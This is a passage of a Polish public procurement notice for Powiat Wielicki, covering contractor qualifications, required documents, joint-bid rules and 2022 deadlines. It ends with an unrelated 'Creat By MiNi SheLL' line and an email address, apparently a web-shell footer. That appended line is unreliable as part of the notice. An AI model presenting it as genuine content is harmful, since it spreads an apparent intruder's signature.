spełnia wymagania co do zakresu oraz co do wartości. W tym<br/>przypadku Wykonawca zobowiązany jest przedstawić w wykazie usług informacje o faktycznym stanie wykonania usługi na<br/>dzień składania ofert. Zamawiający nie dopuszcza sumowania usług, tj. usług wykonywanych w ramach kilku umów w celu<br/>wykazania wymaganej wartości zamówienia. Wartość zamówienia musi być zrealizowana w ramach 1 umowy.<br/>Uwaga 2:Warunki udziału w zamówieniu dotyczą oddzielnie każdej z Części zamówienia co oznacza, że te same usługi nie<br/>mogą być wykazane w każdej z dwóch Części i osoby wykazane przy spełnieniu warunków nie mogą się powtarzać czyli<br/>niedopuszczalne jest wskazanie tych samych osób do obu części przedmiotowego zamówienia.<br/>Uwaga 3: W przypadku Wykonawców wspólnie ubiegających się o zamówienie, warunki może spełnić jeden, kilku lub<br/>łącznie wszyscy Wykonawcy ubiegający się o udzielenie zamówienia.<br/>Uwaga 4: Wykonawca w celu wykazania spełniania w/w warunku może wskazać osoby będące obywatelem państwa<br/>członkowskiego UE, która nabyła kwalifikacje zawodowe tj. uprawnienia zawodowe do wykonywania samodzielnych funkcji<br/>w dziedzinie geodezji i kartografii i posiada wpis do centralnego rejestru osób prowadzonego przez Głównego Geodetę<br/>Kraju zgodnie z przepisami ustawy z dnia 17.05.1989r. Prawo geodezyjne i kartograficzne (t.j. Dz.U. z 2021r. poz. 1990 ze<br/>zm.), na zasadach określonych w ustawie z dnia 22 grudnia 2015r. o zasadach uznawania kwalifikacji zawodowych<br/>nabytych w państwach członkowskich Unii Europejskiej (t.j. Dz.U. z 2020r. poz. 220)<br/>Uwaga 5:Jeżeli w dokumentach składanych w celu potwierdzenia spełniania warunków udziału w postępowaniu, kwoty będą<br/>wyrażane w walucie obcej, kwoty te zostaną przeliczone na PLN wg średniego kursu PLN w stosunku do walut obcych<br/>ogłaszanego przez Narodowy Bank Polski (Tabela A kursów średnich walut obcych) w dniu opublikowania ogłoszenia<br/>o zamówieniu w Dzienniku Urzędowym Unii Europejskiej. Jeżeli w tym dniu nie będzie opublikowany średni kurs NBP,<br/>Zamawiający przyjmie średni kurs z ostatniego dnia przed dniem publikacji. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">oświadczenie wykonawcy, w<br/>zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego<br/>2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o<br/>dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami<br/>Ogłoszenie nr 2022/BZP 00114525/01 z dnia 2022-04-07<br/>2022-04-07 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy<br/>należącego do tej samej grupy kapitałowej – zgodnie z załącznikiem nr 6 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)<br/>wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych w okresie ostatnich 3 lat przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy– w tym okresie, wraz z podaniem ich wartości,<br/>przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane- zgodnie z załącznikiem 4 do SWZ oraz<br/>załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których<br/>mowa są referencje bądź inne dokumenty wystawione przez podmiot na rzecz którego usługi były wykonywane, a w przypadku<br/>świadczeń okresowych lub ciągłych są wykonywane , a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie<br/>jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal<br/>wykonywanych referencje bądź inne dokumenty<br/>potwierdzające należyte wykonanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,<br/>2) wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a<br/>także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami – zgodnie ze<br/>wzorem określonym w załączniku nr 5 do SWZ.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1/.Formularz ofertowy– Załącznik nr 2 do SWZ;<br/>2/. Zobowiązanie podmiotu trzeciego do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby wykonania<br/>zamówienia (jeśli dotyczy) – załącznik nr 7 do SWZ<br/>Wymagana forma: Zobowiązanie musi być złożone w oryginale w postaci dokumentu elektronicznego podpisanego<br/>kwalifikowanym podpisem elektronicznym przez osoby upoważnione do reprezentowania podmiotu zgodnie z jego formą<br/>reprezentacji, na zdolnościach którego polega wykonawca, określoną w dokumencie rejestrowym właściwym dla formy<br/>organizacyjnej tego podmiotu lub innym dokumencie<br/>3/. Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia Wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia mogą polegać na zdolnościach tych z<br/>wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane. W takiej sytuacji wykonawcy są<br/>zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które usługi/dostawy wykonają poszczególni wykonawcy –<br/>zgodnie z załącznikiem 9 do SWZ.<br/>Wymagana forma: Wykonawcy składają oświadczenia w oryginale w postaci dokumentu elektronicznego podpisanego<br/>podpisem kwalifikowanym lub podpisem zaufanym lub osobistym przez osoby<br/>upoważnione do reprezentowania wykonawców zgodnie z formą reprezentacji określoną w dokumencie rejestrowym<br/>właściwym dla formy organizacyjnej lub w innym dokumencie.<br/>4/.Pełnomocnictwo (jeśli dotyczy): 1) Gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych,<br/>wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa<br/>obejmujący swym zakresem umocowanie do złożenia oferty lub do<br/>złożenia oferty i podpisania umowy. 2) W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia<br/>wykonawcy<br/>są zobowiązani do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie<br/>do reprezentowania w postępowaniu o udzielenie zamówienia tych wykonawców, należy załączyć do oferty.<br/>Wymagana forma: a. oryginał w postaci elektronicznej podpisany kwalifikowanym podpisem elektronicznym, podpisem<br/>zaufanym lub osobistym przez osobę upoważnioną do reprezentowania<br/>wykonawcy/wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z formą reprezentacji, określoną w<br/>dokumencie rejestrowym właściwym dla formy organizacyjnej, lub<br/>b. elektroniczna kopia dokumentu (cyfrowe odwzorowanie dokumentu papierowego) poświadczona za zgodność z<br/>oryginałem przez notariusza ( art. 97 § 2 ustawy z dnia 14.02.1991<br/>r. prawo o notariacie ,DZ.U z 2020 r., poz. 1192) które to poświadczenie notariusz opatruje kwalifikowanym podpisem<br/>elektronicznym, bądź też poprzez opatrzenie skanu pełnomocnictwa, sporządzonego uprzednio w formie pisemnej,<br/>kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym mocodawcy. Elektroniczna kopia<br/>pełnomocnictwa nie może być uwierzytelniona przez pełnomocnika <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o zamówienie muszą ustanowić pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź uchwały. 2. Wykonawcy tworzący jeden podmiot przedłożą wraz z ofertą stosowne<br/>pełnomocnictwo.<br/>3. Pełnomocnictwo sporządza się w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym. 4. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców<br/>występujących wspólnie (przez każdego z Wykonawców lub pełnomocnika). 5. W przypadku wspólnego ubiegania się o<br/>zamówienie przez Wykonawców, oświadczenie, o którym mowa w art. 125 ust. 1 składa każdy z Wykonawców wspólnie<br/>ubiegających się o zamówienie. Oświadczenie to potwierdza spełnianie warunków udziału w postępowaniu oraz brak<br/>podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnianie<br/>warunków udziału w postępowaniu, oraz brak podstaw wykluczenia. 6. Oświadczenia i dokumenty potwierdzające brak<br/>podstaw do wykluczenia z postępowania, w tym oświadczenie dotyczące przynależności lub braku przynależności do tej<br/>samej grupy kapitałowej, składa każdy z Wykonawców wspólnie ubiegający się o zamówienie publiczne. 7. W przypadku<br/>Wykonawców wspólnie składających ofertę dokumenty w zakresie zdolności technicznej lub zawodowej składane przez<br/>konsorcjum lub spółkę cywilną zostaną ocenione pod kątem łącznego spełnienia wymagań zamawiającego przez<br/>występujących wspólnie<br/>wykonawców na podstawie złożonych dokumentów. 8. Zgodnie z art. 117 ust. 4 ustawy pzp. wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia publicznego, w okolicznościach gdy Zamawiający określa warunki udziału w<br/>postępowaniu dotyczące uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w<br/>art. 112 ust. 2 pkt 2 ustawy pzp. lub warunki dotyczące wykształcenia, kwalifikacji zawodowych lub doświadczenia,<br/>zobowiązani są do dołączenia do<br/>wniosku o dopuszczenie do udziału w postępowaniu albo do oferty oświadczenia, z którego wynika, które usługi wykonają<br/>poszczególni wykonawcy, zgodnie z załącznikiem nr 9 do SWZ. 9. Wszelka korespondencja prowadzona będzie wyłącznie z<br/>podmiotem występującym jako pełnomocnik Wykonawców składających wspólną ofertę 10. W przypadku, gdy oferta<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>zostanie wybrana, Zamawiający może zażądać przed zawarciem umowy w sprawie zamówienia publicznego umowy<br/>regulującej współpracę tych Wykonawców <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zawarto w paragrafie 13 projektowanych postanowień umowy - załącznik nr 8 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-09 08:45</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy złożyć za pośrednictwem Formularza do złożenia/zmiany/ wycofania oferty dostępnego na ePUAP i udostępnionego również na miniPortalu https://miniportal.uzp.gov.pl/, jako odbiorcę wskazując POWIAT WIELICKI</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-09 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-07</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com